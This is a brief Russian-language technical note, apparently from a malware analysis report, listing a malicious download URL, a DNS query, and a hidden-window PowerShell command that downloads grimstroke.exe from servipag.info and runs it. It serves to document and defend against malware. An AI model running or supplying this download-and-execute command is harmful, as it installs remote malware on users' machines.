Техническая информация
- http://servipag.info/04012019/grimstroke.exe как grimstroke.exe
- DNS ASK se###pag.info
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (new-object net.webclient).DownloadFile('http://servipag.info/04012019/grimstroke.exe','grimstroke.exe');Start-Process grimstroke.exe;Sleep 10000' (со скрытым окном)